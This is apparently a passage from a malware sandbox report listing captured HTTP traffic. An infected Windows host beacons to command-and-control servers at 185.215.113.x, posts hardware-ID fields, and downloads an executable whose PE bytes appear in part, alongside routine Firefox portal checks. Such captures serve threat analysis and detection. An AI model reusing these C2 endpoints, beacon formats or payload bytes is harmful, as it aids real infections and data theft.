Dec 19, 2024 10:12:50.942790031 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83892 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:51.146357059 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:51.463418961 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83893 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:51.482393026 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:51.797482014 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83893 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:51.843981981 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:52.158382893 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83894 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:52.712173939 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:53.029190063 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83894 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:53.256851912 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:53.571872950 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83895 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:56.913391113 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:57.228930950 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83899 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	50234	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:50.341259003 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 19, 2024 10:12:51.671832085 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.6	50237	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:50.395124912 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.6	50238	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:50.702271938 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.6	50243	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:51.073385000 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.6	50245	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:51.600007057 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.6	50246	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:51.927666903 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.6	50250	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:52.340815067 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.6	50252	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:53.153392076 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	50253	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:53.308952093 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 19, 2024 10:12:54.670344114 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	50254	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:53.702236891 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:12:54.789169073 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76450 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:12:57.232938051 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:12:57.548096895 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76453 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	50255	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:54.502717972 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 19, 2024 10:12:55.860620975 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:12:55.865211964 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 2d 2d 0d 0a Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build"stok------AKKKFBGDHJKFHJJJJDGC--
Dec 19, 2024 10:12:56.312814951 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.6	50257	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:55.142083883 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 19, 2024 10:12:56.473514080 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:55 GMT Content-Type: application/octet-stream Content-Length: 2928640 Last-Modified: Thu, 19 Dec 2024 08:27:44 GMT Connection: keep-alive ETag: "6763d900-2cb000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 e0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 50 00 00 04 00 00 52 61 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(O@PRa-@M$a$$ $h@.rsrc$x@.idata $z@assqlaww+$+\|@blchljdgO,@.taggant0O",@
Dec 19, 2024 10:12:56.473866940 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:56.473893881 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:56.474690914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:56.474713087 CET	1236	IN	Data Raw: 48 ad f7 3d 02 f5 11 a1 40 e4 52 2a 58 2c b6 7f 85 50 6a 89 01 34 ad b9 a9 2c f2 5a a5 b0 ba 8e 91 76 c2 a7 81 be ca 7f 5a da 98 fb 60 8e b4 ad 79 8c 9a a9 7d fc a9 6d 55 2c 7e d0 ef 1b 82 e0 45 28 96 d1 bd b2 ba a9 46 44 ae 51 ad 4c 6a a8 83 8b Data Ascii: H=@R*X,Pj4,ZvZ`y}mU,~E(FDQLjDDWJB<{/Zn{yr}<j}Z}.&M=5:R;U]:8aj]t>,%{~zsFEklZryb\|a\|bm lHE3Q1V
Dec 19, 2024 10:12:56.475637913 CET	1236	IN	Data Raw: 93 94 b4 e5 a4 7c be a0 44 2b e9 4c 29 37 1f 39 71 54 36 f1 97 8c 61 b8 ce 91 91 15 95 1c 05 d9 32 16 6b ea 8d 11 55 7a 62 dd 91 27 da d9 69 7d aa 9d 6b 0e ed 39 11 7a 8e d5 6c bf 76 2e a4 36 ce e3 b6 09 0e 01 6b 5a 75 fb b3 2e 56 0c 6a 3c 15 31 Data Ascii: \|D+L)79qT6a2kUzb'i}k9zlv.6kZu.Vj<1YW<.ut";J^!_IuU)sN#j jxH.>1wq01xco7ko $V=tAW.Jo`x"it"i\Xq7h+lk%A?.A2
Dec 19, 2024 10:12:56.475656986 CET	1236	IN	Data Raw: 47 e5 c1 3d 94 b4 93 11 0e 26 6c b0 94 53 33 c0 93 d0 63 29 45 03 3a a5 57 f6 f9 b0 c1 2c 96 21 5e 96 5f 1b cd e4 21 ac d9 b0 90 a9 09 ef 2d 69 8b 8a ec a8 8d 54 e6 8d 74 20 01 a5 e7 70 5a a1 4f 4c 64 ad 39 03 8a 24 94 6e 9a 89 93 24 a2 3d aa ab Data Ascii: G=&lS3c)E:W,!^_!-iTt pZOLd9$n$=:N\|zq5=\|bqGa>EM.7\|y>$)dujV6j} I)c*$"aI#.k^-_ 2.Aj$IO^ `%1!E
Dec 19, 2024 10:12:56.476618052 CET	1236	IN	Data Raw: 8d 3d 64 84 27 48 4a 36 0d d1 6a a5 26 b1 4e 78 55 22 62 5d 0d a3 a9 bc 8c 04 6a ab 05 ef d1 b9 6b fd 12 3b 96 23 b2 a8 21 b0 b0 ad ac 16 c3 ad 3d 22 93 f5 8d 1c e9 31 4a a0 cb 99 e5 22 b0 c5 94 c4 ef 98 b3 dd 69 a9 a8 97 8a 5f 55 e0 c2 a1 21 f6 Data Ascii: =d'HJ6j&NxU"b]jk;#!="1J"i_U!qEg=N/k^cDEQ$9o "@oa551,~ bl$5kE\|JJ"h%L[ \|Uca$9Y7Ldf&9.cE"
Dec 19, 2024 10:12:56.476644993 CET	1236	IN	Data Raw: e1 2b 33 34 98 df 62 ad 41 ca 76 ab 95 38 b6 15 0e ec 7c 77 d2 2c 8a 85 11 40 64 a0 21 1f 8b 3a 10 f4 63 b1 55 b0 1a 35 4e 25 ab bc 71 14 5f ab 24 2c 5e 37 10 77 68 3a cd af cd 51 8f 1b ba 66 25 1b b7 dd 97 97 f2 3c 94 ac aa 92 09 a0 2c ac 0d a4 Data Ascii: +34bAv8\|w,@d!:cU5N%q_$,^7wh:Qf%<,)f=.XUdVB9Hdp97V6:8A,28cYLPGCd!D3Ub_w=Eq\|/e:UV4AbJ}d9t@d pj
Dec 19, 2024 10:12:56.477514982 CET	1236	IN	Data Raw: 71 22 62 3d 02 78 e9 7c 83 36 15 44 ad a0 5b 7f 19 23 be 37 98 87 73 8f 8b d0 f6 ab 35 56 3a 40 ab 61 73 28 ca b8 b3 b0 65 a7 76 3b b3 1f 64 d9 c4 33 80 81 d1 b0 8e e5 a7 e0 f6 7f 2e 56 64 dd 94 88 6a d9 24 f6 e6 b9 96 a4 09 42 94 2c af 39 a2 a7 Data Ascii: q"b=x\|6D[#7s5V:@as(ev;d3.Vdj$B,9BVD[}}PlHxSPu"G^PWOA%kisad:afUSIzV=1)\|sE"B>H:L]$"FxSp.t^APJR]
Dec 19, 2024 10:12:56.594316959 CET	1236	IN	Data Raw: a5 2e d4 ea eb db 58 69 99 66 ec 6e 4f dc e9 74 54 c0 ae a3 a9 e2 24 d4 0f 4a 5d fd 10 42 90 6d 88 19 66 6b 08 8a 93 b2 40 02 83 83 eb 62 ad d3 94 83 92 f7 5d 1a d6 f1 55 a2 93 9d 90 af 5e 39 ba 90 06 70 0b f3 29 06 8e d1 27 7e 31 4e d6 29 f2 2b Data Ascii: .XifnOtT$J]Bmfk@b]U^9p)'~1N)+Y^0/ae@$BaD#Z%dtu^1VMDIZF'i=4Vp%5LLWg"NE29iQKv[mG!lhfp/k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.6	50259	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:56.426186085 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 19, 2024 10:12:58.383512974 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.6	50261	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:13:00.015707970 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49707	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:09:03 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 52 4c 57 31 7a 79 69 5a 38 6b 32 30 35 31 72 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 34 62 65 63 63 39 65 36 61 39 30 64 34 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: RLW1zyiZ8k2051r3.1Context: a364becc9e6a90d4
